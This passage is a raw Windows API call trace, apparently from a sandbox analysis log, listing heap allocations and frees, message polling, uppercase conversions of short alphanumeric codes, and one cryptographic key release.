returned 0x24b1c98 [0261.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0261.131] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0261.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.131] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0261.131] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.132] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0261.132] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.132] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0261.132] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0261.132] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.132] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.132] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0261.133] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.133] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.133] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.133] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.133] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.133] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.133] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.134] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.134] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.134] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0261.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.134] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.134] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.134] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.134] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.140] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.140] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.140] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.142] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0261.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.142] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0261.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.142] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0261.143] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0261.143] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0261.143] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.143] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.143] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.143] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.144] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.144] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0261.144] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0261.145] CryptDestroyKey (hKey=0xaa5920) returned 1 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0261.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0261.147] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0261.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.148] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0261.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0261.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.148] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0261.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0261.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.148] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0261.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0261.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0261.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0261.149] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0261.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0261.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.149] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.149] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0261.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0261.149] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.150] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.150] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.150] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0261.150] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0261.150] 